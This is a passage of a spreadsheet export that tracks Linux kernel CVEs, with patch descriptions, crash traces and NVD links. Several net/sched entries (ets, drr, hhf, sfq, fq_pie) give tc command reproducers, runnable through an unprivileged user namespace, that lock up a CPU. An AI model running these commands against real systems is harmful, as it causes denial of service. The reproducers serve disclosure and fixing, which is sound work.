(AVIC) Enablement") moved the GA log allocation from iommu_init_pci()
to enable_iommus_vapic(), which is called on every resume.
iommu_init_ga_log() assigns iommu-&gt;ga_log and iommu-&gt;ga_log_tail
unconditionally. Each resume therefore replaces the boot-time pointers
and leaks both old allocations. The function also uses GFP_KERNEL from a
syscore resume callback, where interrupts are disabled and the non-boot
CPUs are offline.
Return early if both buffers are already allocated. Clear the pointers
in free_ga_log() so a partial allocation failure cannot leave ga_log
dangling.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98003</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98004</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="inlineStr"/>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr"/>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/riscv: Serialize command queue publishing
Serialize command queue publishing so software producer state advances only
after a command is written and the hardware tail is updated. Wait for
hardware consumption outside the queue lock when the command queue is full
so other CPUs are not blocked behind a long poll.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98004</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98005</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="inlineStr"/>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr"/>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: delimit inode_share cache key components
Previously, inode_share keys were encoded as follows:
  fingerprint || domain_id
It would be better to have a separator between the fingerprint and domain
ID so that the fingerprint won't be parsed as part of a domain ID.
Change the key encoding as follows:
  domain_id || '\0' || fingerprint
Since domain_id is a NUL-terminated string, this makes the in-memory key
indices unambiguous.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98005</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98006</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr"/>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: caiaq: Decoupling ep1_in_urb in caiaq dev
The epq_in_urb object belonging to the caiaq device is coupled within
the struct snd_usb_caiaqdev. After usb_submit_urb(epq_in_urb, GFP_KERNEL)
executes successfully, epq_in_urb is successfully added to the urbp_list
queue of the dummy HCD driver (userspace specifies dummy_hcd as the HCD
layer driver for the caiaq USB device).
When init_card() calls snd_usb_caiaq_send_command() which subsequently
fails due to a timeout, and proceeds to call snd_card_free() to release
the card, the embedded ep1_in_urb object is also freed. When the dummy
HCD driver detects that the URB has been unlinked, it returns the URB
(by usb_hcd_giveback_urb()), which triggers [1].
Decouple the ep1_in_urb object from the struct snd_usb_caiaqdev and switch
to using a pointer instead. Separately allocate and manage the memory for
ep1_in_urb to prevent the release of the snd_card memory object from
interfering with it.
midi_out_urb has the same issue as ep1_in_urb and is handled in the same
way.
[1]
BUG: KASAN: slab-use-after-free in usb_free_urb+0x24/0x120 drivers/usb/core/urb.c:96
Write of size 4 at addr ffff88803cee1050 by task ktimers/1/29
Call Trace:
 usb_free_urb+0x24/0x120 drivers/usb/core/urb.c:96
 dummy_timer+0xaac/0x4d50 drivers/usb/gadget/udc/dummy_hcd.c:2019
 __run_hrtimer kernel/time/hrtimer.c:2067 [inline]
 __hrtimer_run_queues+0x3eb/0xaf0 kernel/time/hrtimer.c:2124
 hrtimer_run_softirq+0x1e1/0x2e0 kernel/time/hrtimer.c:2141
Allocated by task 36:
 snd_card_new+0x7b/0x110 sound/core/init.c:184
 create_card sound/usb/caiaq/device.c:429 [inline]
 snd_probe+0x236/0x1af0 sound/usb/caiaq/device.c:544
Freed by task 36:
 snd_card_free_when_closed sound/core/init.c:630 [inline]
 snd_card_free+0x138/0x1d0 sound/core/init.c:662
 snd_probe+0x162b/0x1af0 sound/usb/caiaq/device.c:553</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98006</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98007</t>
        </is>
      </c>
      <c r="D643" s="5" t="inlineStr"/>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="inlineStr"/>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr"/>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject non-scalar bpf_loop iteration counts
bpf_loop() declares its nr_loops argument as ARG_ANYTHING. Privileged
programs may pass pointer values to such arguments, so check_func_arg()
lets a pointer-valued R1 reach the helper-specific checks.
Since commit bb124da69c47 ("bpf: keep track of max number of bpf_loop
callback iterations"), the verifier marks R1 precise and reads its upper
bound to limit callback simulation. Precision backtracking only accepts
scalar registers, so passing a pointer instead triggers the "backtracking
misuse" verifier warning. Kernels with panic_on_warn enabled subsequently
panic.
Introduce ARG_SCALAR for helper arguments that only accept scalar values
and use it for bpf_loop() nr_loops. Generic helper argument validation then
rejects pointers before loop inlining and precision processing.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98007</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98008</t>
        </is>
      </c>
      <c r="D644" s="5" t="inlineStr"/>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="inlineStr"/>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr"/>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: macb: fix NULL pointer dereference on unbind with fixed-link
When the device tree describes a fixed-link and has no "mdio" child
node, macb_mii_init() returns early without allocating the MDIO bus,
leaving bp-&gt;mii_bus as NULL.
Two cleanup paths then dereference this NULL bus:
1. On driver unbind, macb_remove() unconditionally calls
   mdiobus_unregister(bp-&gt;mii_bus), which oopses:
  Unable to handle kernel NULL pointer dereference at virtual address 00000000000004a8
  pc : mdiobus_unregister+0x14/0xa4
  lr : macb_remove+0x38/0xa4
  Call trace:
   mdiobus_unregister+0x14/0xa4 (P)
   macb_remove+0x38/0xa4
   platform_remove+0x20/0x30
   device_release_driver_internal+0x1c8/0x224
   unbind_store+0xb4/0xbc
2. On the probe error path in macb_probe(), reached when
   macb_mii_init() has succeeded but a subsequent step fails, the
   err_out_unregister_mdio label runs the same unconditional cleanup.
mdiobus_unregister() and mdiobus_free() do not guard against a NULL
bus, so guard the calls in both macb_remove() and the probe error
path.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98008</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98009</t>
        </is>
      </c>
      <c r="D645" s="5" t="inlineStr"/>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="inlineStr"/>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr"/>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: clamp quantum in parse and fallback paths
ets_qdisc_change() falls back to psched_mtu() with no floor for bands
without an explicit quantum. With a crafted size table qdisc_pkt_len
reaches ~2 GiB, so a zero psched_mtu on a headerless device makes the
deficit-refill loop spin under the qdisc lock.
Move the floor into ets_quantum_parse() so explicitly configured quanta
are also clamped to [256, 1&lt;&lt;20], not just the fallback path.
Conditions to recreate the bug:
  CONFIG_NET_SCH_ETS=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root ets bands 3 strict 2 quanta 1 1</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98009</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98010</t>
        </is>
      </c>
      <c r="D646" s="5" t="inlineStr"/>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="inlineStr"/>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr"/>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: drr: clamp quantum in change class
drr_change_class() rejects explicit quantum==0 but falls back to
psched_mtu() with no floor. With a crafted size table qdisc_pkt_len
reaches ~2 GiB, so quantum=1 (or a zero psched_mtu on a headerless
device) makes the deficit-refill loop spin under the qdisc lock.
Add clamp_t(u32, quantum, 256, 1&lt;&lt;20) after the zero reject and on the
fallback path. The explicit-zero reject is preserved.
Conditions to recreate the bug:
  CONFIG_NET_SCH_DRR=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root drr
  tc class add dev dummy0 parent 1: classid 1:1 drr quantum 1</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98010</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98011</t>
        </is>
      </c>
      <c r="D647" s="5" t="inlineStr"/>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="inlineStr"/>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr"/>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: hhf: clamp quantum in change and init paths
hhf_change() accepts any quantum from userspace, including 1. With a
crafted size table qdisc_pkt_len reaches ~2 GiB, so quantum=1 makes
the deficit-refill loop spin ~2^31 times under the qdisc lock
(a soft lockup / denial of service).
Add max(256U, ...) in hhf_change() matching fq_codel_change(). Clamp
hhf_init() to [256, 1&lt;&lt;20] matching the siblings, and remove the old
fallback that only set quantum=256 on overflow.
Conditions to recreate the bug:
  CONFIG_NET_SCH_HHF=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root hhf
  tc qdisc change dev dummy0 root hhf quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98011</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98012</t>
        </is>
      </c>
      <c r="D648" s="5" t="inlineStr"/>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="inlineStr"/>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr"/>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sfq: clamp quantum in change path
sfq_change() accepts any non-negative quantum (only rejects
(int)ctl-&gt;quantum &lt; 0). With a crafted size table qdisc_pkt_len reaches
~2 GiB, so quantum=1 makes the deficit-refill loop spin ~2^31 times
under the qdisc lock (a soft lockup / denial of service).
Add max(256U, ...) matching fq_codel_change(). Reject quantum &gt; 1&lt;&lt;20
with -EINVAL, matching fq_codel_change() and the init clamp.
Conditions to recreate the bug:
  CONFIG_NET_SCH_SFQ=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root sfq
  tc qdisc change dev dummy0 root sfq quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98012</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98013</t>
        </is>
      </c>
      <c r="D649" s="5" t="inlineStr"/>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="inlineStr"/>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr"/>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: fq_pie: clamp quantum in change path
fq_pie_change() accepts any quantum value from userspace, including 1.
With a crafted size table qdisc_pkt_len reaches ~2 GiB, so quantum=1
makes the deficit-refill loop spin ~2^31 times under the qdisc lock
(a soft lockup / denial of service).
Add max(256U, ...) matching fq_codel_change().
Conditions to recreate the bug:
  CONFIG_NET_SCH_FQ_PIE=y. Requires CAP_NET_ADMIN (namespace-local via
  unshare -Urn suffices).
  tc qdisc add dev dummy0 root fq_pie
  tc qdisc change dev dummy0 root fq_pie quantum 1 stab data 32768 size_log 15 cell_log 0</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98013</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98014</t>
        </is>
      </c>
      <c r="D650" s="5" t="inlineStr"/>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="inlineStr"/>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr"/>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: E-Switch, prevent mc_list repopulation during vport disable
In mlx5_esw_vport_disable(), move esw_apply_vport_rx_mode() ahead
of esw_vport_change_handle_locked() so vport-&gt;allmulti_rule is
NULL before the change handler observes it.
During FW-fatal recovery the disable runs while dev-&gt;state ==
INTERNAL_ERROR. The promisc query inside esw_update_vport_rx_mode()
fails and returns early, leaving vport-&gt;allmulti_rule intact, so
esw_update_vport_mc_promisc() runs and adds MLX5_ACTION_ADD entries
to vport-&gt;mc_list whose flow rules are then installed in the FDB
by esw_add_mc_addr(). esw_destroy_legacy_table() tears down the
FDB with those refs still held, corrupting the sub-tree and
leaving dangling flow_rule pointers in vport-&gt;mc_list.
Two-stage failure on `echo 1 &gt; /sys/bus/pci/devices/&lt;bdf&gt;/reset`:
  refcount_t: underflow; use-after-free.
   tree_put_node+0xef/0x110 [mlx5_core]
   clean_tree+0x44/0xd0 [mlx5_core] (x5)
   mlx5_fs_core_cleanup+0x57/0x1c0 [mlx5_core]
   mlx5_unload+0x65/0xd0 [mlx5_core]
   ... mlx5_health_try_recover
  BUG: unable to handle page fault for address: 0000000003000055
   down_write+0x1c/0x60
   mlx5_del_flow_rules+0x33/0x1f0 [mlx5_core]
   esw_del_mc_addr+0x7b/0x170 [mlx5_core]
   esw_apply_vport_addr_list+0x56/0xf0 [mlx5_core]
   esw_vport_change_handle_locked+0x28b/0x310 [mlx5_core]
   mlx5_esw_vport_enable+0x270/0x4a0 [mlx5_core]
   ... mlx5_load ... mlx5_health_try_recover
esw_apply_vport_rx_mode(false, false) clears vport-&gt;allmulti_rule
via its local state machine even when the FW del fails. With the
rule NULL the !IS_ERR_OR_NULL(allmulti_rule) gate in the change
handler closes, no rules are installed during disable, and the
reload starts with a clean mc_list.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98014</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98015</t>
        </is>
      </c>
      <c r="D651" s="5" t="inlineStr"/>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="inlineStr"/>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr"/>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: E-Switch: fix use-after-free in mlx5_eswitch_termtbl_put
In mlx5_eswitch_termtbl_put(), the zero-ref cleanup check reads
tt-&gt;ref_count after termtbl_mutex has been released.  Two concurrent
callers on the same mlx5_termtbl_handle race: one decrements ref_count
to zero, removes the hash entry, and calls kfree(tt) while the other
has already dropped the mutex and is about to evaluate
if (!tt-&gt;ref_count), producing a use-after-free.
Fix this by capturing the result of the decrement into a stack-local
last variable before dropping the mutex.  The cleanup decision is now
made entirely under termtbl_mutex, and tt is not touched after
kfree.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98015</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98016</t>
        </is>
      </c>
      <c r="D652" s="5" t="inlineStr"/>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="inlineStr"/>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr"/>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Fix use-after-free race in sample_restore_put()
Concurrent teardown of TC sample rules sharing the same restore
context may re-read restore-&gt;count after dropping restore_lock.
At that point another thread may already have completed cleanup and
freed the restore object.
Use the result of the refcount decrement while holding restore_lock to
determine whether cleanup is needed.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98016</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98018</t>
        </is>
      </c>
      <c r="D653" s="5" t="inlineStr"/>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="inlineStr"/>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
